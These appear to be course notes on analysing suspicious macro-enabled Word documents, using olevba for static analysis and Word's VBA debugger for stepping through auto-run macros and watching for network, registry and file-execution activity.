Analyzing Macro Code in Office Documents

Tools Used:

1. Oletools (OLEVBA): A Python-based suite of tools used to analyze and extract VBA source code from Office documents.

2. Microsoft Word: Used to debug macro code through the VBA Developer Tools.

Steps for Analyzing Macro-Enabled Documents:

1. Initial Setup:

   • Revert the VM Snapshot, copy the course files, and run Fakenet.

   • Open the command prompt in the folder where the sample document is located.

2. Static Analysis with OLEVBA:

   • Execute the command olevba re_test_dlx.doc to analyze the document.

   • OLEVBA provides a summary of the analysis, including potential trigger points such as Auto_Open and Document_Open.

   • Redirect the output to a text file for easier navigation: olevba re_test_dlx.doc > olevba_result.txt.

   • Key Points to Analyze:

     • Focus on trigger points like Auto_Open and Document_Open.

     • Inspect the code for functions like MsgBox (displays a message), internet connections, registry modifications, and file executions.

   
3. Understanding the Macro Code:

   • Analyze the flow of the macro:

     • The macro might display a message, connect to the internet, create a registry entry, and finally execute a file.

   • Pay attention to the usage of functions like RegWrite (registry modification) and Shell (command execution).

   • Look for obfuscation techniques like the use of avg function, which may indicate encrypted or encoded strings.

4. Dynamic Analysis with Microsoft Word:

   • Open the document in Microsoft Word (e.g., Word 2013).

   • Setting Breakpoints:

     • Use Alt + F11 to open the VBA Developer Window.

     • Navigate to the Document_Open subroutine and add an End function to prevent immediate execution of the macro.

     • Set a breakpoint at the first line of the subroutine.

   • Debugging:

     • Enable macro content in the Word document to trigger execution.

     • Return to the VBA editor and step through the code using F8.

     • Skip decrypting functions if not needed using Shift + F8, but it's essential to understand the decryption algorithm.

     • Use the Watch Window to monitor variables and expressions, especially to observe decrypted text or key indicators of compromise (IOCs).

5. Key Observations:

   • Identify network activity, such as GET requests and the corresponding URLs.

   • Detect the creation of persistent mechanisms (e.g., writing to the registry).

   • Observe any execution of downloaded or created files, such as badfile.exe.

Summary:

• OLEVBA is used for static analysis, helping to identify key functions and trigger points within the macro code.

• Microsoft Word's VBA Editor is essential for dynamic analysis, allowing step-by-step debugging to understand the macro's behavior fully.

• Key techniques include setting breakpoints, skipping unnecessary decryption steps, and using the Watch Window to monitor variables and expressions.

These notes cover the fundamental steps and observations when analyzing macro-enabled Word documents for potential malicious activity.